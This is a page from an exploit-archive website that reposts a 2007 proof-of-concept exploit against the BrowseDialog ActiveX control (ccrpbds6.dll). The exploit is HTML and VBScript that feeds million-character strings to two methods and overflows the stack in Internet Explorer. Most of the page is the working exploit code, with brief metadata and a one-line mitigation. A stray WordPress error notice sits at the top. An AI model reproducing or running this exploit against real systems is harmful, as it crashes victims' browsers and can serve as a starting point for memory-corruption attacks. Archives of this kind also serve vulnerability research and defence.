Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service - exploit.company
header-logo
Suggest Exploit
vendor:
by:
shinnai
7.5
CVSS
HIGH
Denial of Service
Stack-based Buffer Overflow
CWE
Product Name:
Affected Version From: ccrpbds6.dll
Affected Version To: ccrpbds6.dll
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
2007

BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service

The BrowseDialog class in ccrpbds6.dll is vulnerable to a Denial of Service attack. The vulnerability is caused by two methods in the DLL that are unable to handle long strings, leading to a stack overflow. This vulnerability can be triggered by selecting the 'IsFolderAvailable' or 'RootFolder' options in the dropdown menu and clicking the 'Click here to start the test' button.

Mitigation:

To mitigate this vulnerability, it is recommended to update the affected DLL to a patched version that handles long strings correctly.
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Soundtrack: "Zeta Reticoli" (Meganoidi)
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 I found other two methods in this dll that are unable to handle long string.
 It seems to be a Stack Overflow, but I'm not sure of this :)
------------------------------------------------------------------------------


<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='BrowseDialog'></object>
<select style="width: 404px" name="Pucca">
  <option value = "IsFolderAvailable">IsFolderAvailable</option>
  <option value = "RootFolder">RootFolder</option>
  <option value = "Quoting">Quoting...</option>
</select>



<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   if Pucca.value="IsFolderAvailable" then
     argCount   = 1
     arg1=String(1000000, "A")
     BrowseDialog.IsFolderAvailable arg1
     BrowseDialog.IsFolderAvailable arg1
   elseif Pucca.value="RootFolder" then
     argCount   = 1
     arg1=String(1000000, "A")
     BrowseDialog.RootFolder = arg1
     BrowseDialog.RootFolder = arg1
   else
     MsgBox "Brucia ancora che prima o poi ritornerò" & vbCrLf & _
     "Conservo di nascosto sempre lo stesso smalto" & vbCrLf &_
     "Non temere zeta reticoli on my mind" & vbCrLf &_
     "Aspetterò il momento per un migliore slancio"
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-02-21]

Navigation

Suggest Exploit

Services By CQR